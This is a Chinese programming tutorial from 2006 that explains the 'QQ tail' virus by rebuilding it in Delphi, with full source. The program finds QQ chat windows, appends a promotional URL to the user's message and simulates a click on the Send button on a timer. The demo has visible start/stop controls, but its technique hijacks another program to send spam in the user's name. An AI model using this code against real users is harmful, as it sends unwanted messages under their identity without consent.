网络编程 | 站长之家 | 网页制作 | 图形图象 | 操作系统 | 冲浪宝典 | 软件教学 | 网络办公 | 邮件系统 | 网络安全 | 认证考试 | 系统进程
Firefox | IE | Maxthon | 迅雷 | 电驴 | BitComet | FlashGet | QQ | QQ空间 | Vista | 输入法 | Ghost | Word | Excel | wps | Powerpoint
asp | .net | php | jsp | Sql | c# | Ajax | xml | Dreamweaver | FrontPages | Javascript | css | photoshop | fireworks | Flash | Cad | Discuz!
当前位置 > 网站建设学院 > 网络编程 > Delphi
Tag:注入,存储过程,分页,安全,优化,xmlhttp,fso,jmail,application,session,防盗链,stream,无组件,组件,md5,乱码,缓存,加密,验证码,算法,cookies,ubb,正则表达式,水印,索引,日志,压缩,base64,url重写,上传,控件,Web.config,JDBC,函数,内存,PDF,迁移,结构,破解,编译,配置,进程,分词,IIS,Apache,Tomcat,phpmyadmin,Gzip,触发器,socket
网络编程:ASP教程,ASP.NET教程,PHP教程,JSP教程,C#教程,数据库,XML教程,Ajax,Java,Perl,Shell,VB教程,Delphi,C/C++教程,软件工程,J2EE/J2ME,移动开发
本月文章推荐
.组件技术的本质COM实例分析一.
.在delphi中使用xml文档有两种方法.
.怎样通过编程方式管理nt的用户及.
.用DELPHI的RTTI实现对象的XML持久.
.DELPHI下汉字输入法的编程及使用.
.与文件相关Api函数列表.
.用DELPHI的RTTI实现数据集的简单.
.从获取DBGrid行号想到的.
.一个简单的菜单按钮的实现.
.如何在程序中实现XP模式.
.串口通讯应用程序的解决方案.
.合理应用用户登录界面,用户登录.
.如何移动没有标题的窗体.
.DesignPattern之SimpleFactory.
.DELPHI的原子世界(1).
.谈用Delphi程序获取拨号连接的动.
.Delphi中两个BUG的分析与修复.
.在打印或打印预览前如何获取报表.
.Delphi动态创建树.
.DBGridEh实现单击标题栏排序方法.

QQ尾巴病毒的发送原理分析

发表日期:2006-2-4


QQ尾巴病毒的发送原理分析
近来QQ尾巴病毒大肆发作,我也是经常收到网友们发到来的带尾巴的消息,于是,好奇心一来,我也来研究研究此病毒的发作原理。首先,我不知道QQ尾巴病毒真正的原理,我只是猜测并且自己写了一个类似的程序来实现它。
 
QQ尾巴的发作情况:当用户打开一个QQ消息发送窗口时,病毒会自动往消息文本框里输入文本,然后不等用户反应过来就发出去了。
 
程序实现:首先要找到QQ消息发送窗口的句柄以及消息文本框与“发送”按钮的窗口句柄。
 
一、             如何找到QQ消息发送窗口句柄:
QQ消息发送窗口有两种,一种是消息模式,在这种情况下,窗口标题含有“发送消息”字样;一种是聊天模式,窗口标题含有“聊天中”字样;
通过枚举窗口就可找到相应的句柄:
// 取得QQ的发送消息窗口
function GetQQWnd: HWND;
var
  hCurrentWindow: HWnd;
  WndText:String;
begin
  hCurrentWindow := GetWindow(Application.Handle, GW_HWNDFIRST);
  while hCurrentWindow <> 0 do
  begin
    WndText:=GetWndText(hCurrentWindow);
    if (Pos('聊天中',WndText)>0) or (Pos('发送消息',WndText)>0) then
    begin
      Result:=hCurrentWindow;
      Exit;
    end;
    hCurrentWindow := GetWindow(hCurrentWindow, GW_HWNDNEXT);
  end;
  Result:=0;
end;
 
二、             如何找到“发送”按钮窗口句柄:
找到了QQ的发送消息窗口后,就可以进一步查找“发送”按钮句柄了,如窗口句柄为qqWnd,则可以用一个循环,查找文本中含有“发送”字样的窗口,经过试验发现,“发送”按钮恰恰是窗体的第一个子窗口,这样,可以用
btnWnd:=GetDlgItem(qqWnd,1);  // 发送按钮
来获得“发送”按钮的句柄。
 
三、             如何找到消息文本框窗口句柄:
消息文本框并不好找,不过你可以先在消息文本框中输入几个字母,如“abcd”,这样我们就可以用上述方法来查找了,不过通过实验后,发现消息文本框并不是QQ窗口的直接子窗口,而是其中一个子窗口的子窗口,通过实验,可以用
txtWnd:=GetWindow(GetDlgItem(qqWnd,0),GW_CHILD);  // 文本框
来获得。
 
四、             如何获得原消息文本框的文本:
要获取原消息文本框的文本,只需要一个API函数就行了,如下:
// 获得窗口文本
function GetWndText(hWnd: HWND): String;
Var
  Ret:LongInt;
  mText:PChar;
  Buf:Integer;
begin
  Ret:=SendMessage(hWnd,WM_GETTEXTLENGTH,0,0)+1;
  GetMem(mText,Ret);
  try
    Buf:=LongInt(mText);
    SendMessage(hWnd,WM_GETTEXT,Ret,Buf);
    Result:=StrPas(mText);
  finally
    FreeMem(mText,Ret);
  end;
end;
 
五、             如何住原消息文本框里追加文本:
与取文本相反
// 发送文本到窗口
procedure SetWndText(hWnd: HWND; Text: String);
Var
  Ret:LongInt;
  mText:PChar;
  Buf:Integer;
begin
  GetMem(mText,Length(Text));
  StrCopy(mText,PChar(Text));
  try
    Buf:=LongInt(mText);
    SendMessage(hWnd,WM_SETTEXT,0,Buf);
  finally
    FreeMem(mText,Length(Text));
  end;
end;
六、             如果让“发送”按钮自动点击:
一切都准备好了,现在要开始发送了,为了让消息自动发送,我们可以模拟“发送”按钮被点击了。
  SendMessage(btnWnd,WM_LBUTTONDOWN,MK_LBUTTON,0);
  SendMessage(btnWnd,WM_LBUTTONUP,0,0);
通过模拟一个鼠标在“开始”按钮上的按下与放开,就实现了点击发送功能。
 
七、             其它的定时功能比较简单,在此也不多说了。
 
八、             全部源代码如下:
unit Unit1;
 
interface
 
uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, StdCtrls, ExtCtrls;
 
type
  TForm1 = class(TForm)
    Timer1: TTimer;
    Button1: TButton;
    Edit1: TEdit;
    Label1: TLabel;
    Button2: TButton;
    procedure Timer1Timer(Sender: TObject);
    procedure Button1Click(Sender: TObject);
    procedure Button2Click(Sender: TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end;
 
var
  Form1: TForm1;
 
implementation
 
{$R *.dfm}
 
// 获得窗口文本
function GetWndText(hWnd: HWND): String;
Var
  Ret:LongInt;
  mText:PChar;
  Buf:Integer;
begin
  Ret:=SendMessage(hWnd,WM_GETTEXTLENGTH,0,0)+1;
  GetMem(mText,Ret);
  try
    Buf:=LongInt(mText);
    SendMessage(hWnd,WM_GETTEXT,Ret,Buf);
    Result:=StrPas(mText);
  finally
    FreeMem(mText,Ret);
  end;
end;
// 发送文本到窗口
procedure SetWndText(hWnd: HWND; Text: String);
Var
  Ret:LongInt;
  mText:PChar;
  Buf:Integer;
begin
  GetMem(mText,Length(Text));
  StrCopy(mText,PChar(Text));
  try
    Buf:=LongInt(mText);
    SendMessage(hWnd,WM_SETTEXT,0,Buf);
  finally
    FreeMem(mText,Length(Text));
  end;
end;
// 取得QQ的发送消息窗口
function GetQQWnd: HWND;
var
  hCurrentWindow: HWnd;
  WndText:String;
begin
  hCurrentWindow := GetWindow(Application.Handle, GW_HWNDFIRST);
  while hCurrentWindow <> 0 do
  begin
    WndText:=GetWndText(hCurrentWindow);
    if (Pos('聊天中',WndText)>0) or (Pos('发送消息',WndText)>0) then
    begin
      Result:=hCurrentWindow;
      Exit;
    end;
    hCurrentWindow := GetWindow(hCurrentWindow, GW_HWNDNEXT);
  end;
  Result:=0;
end;
// 定时处理
procedure TimerProc;
var
  qqWnd,txtWnd,btnWnd:HWND;
  Msg:String;
begin
  qqWnd:=GetQQWnd;
  if qqWnd=0 then Exit;
 
  btnWnd:=GetDlgItem(qqWnd,1);  // 发送按钮
  txtWnd:=GetWindow(GetDlgItem(qqWnd,0),GW_CHILD);  // 文本框
  if (btnWnd=0) or (txtWnd=0) then Exit;
  Msg:=GetWndText(txtWnd);
  Msg:=Msg+#13+#10+'欢迎光临绿荫网络http://www.lvyin.net';
  SetWndText(txtWnd,Msg);
  SendMessage(btnWnd,WM_LBUTTONDOWN,MK_LBUTTON,0);
  SendMessage(btnWnd,WM_LBUTTONUP,0,0);
end;
 
procedure TForm1.Timer1Timer(Sender: TObject);
begin
  TimerProc;
end;
 
procedure TForm1.Button1Click(Sender: TObject);
begin
  Timer1.Enabled :=not Timer1.Enabled;
  if Timer1.Enabled then
    Button1.Caption :='停 止'
  else
    Button1.Caption :='开 始';
end;
 
procedure TForm1.Button2Click(Sender: TObject);
begin
  Timer1.Interval :=StrToInt(Edit1.Text);
end;
 
end.
上一篇:如何使程序在运行时自动注册ActiveX控件 人气:4935
下一篇:浅谈控件(组件)制作方法一(附带一delphi导出数据到Excel的组件实例)(原创) 人气:6873
浏览全部Delphi的内容 Dreamweaver插件下载 网页广告代码 祝你圣诞节快乐 2009年新年快乐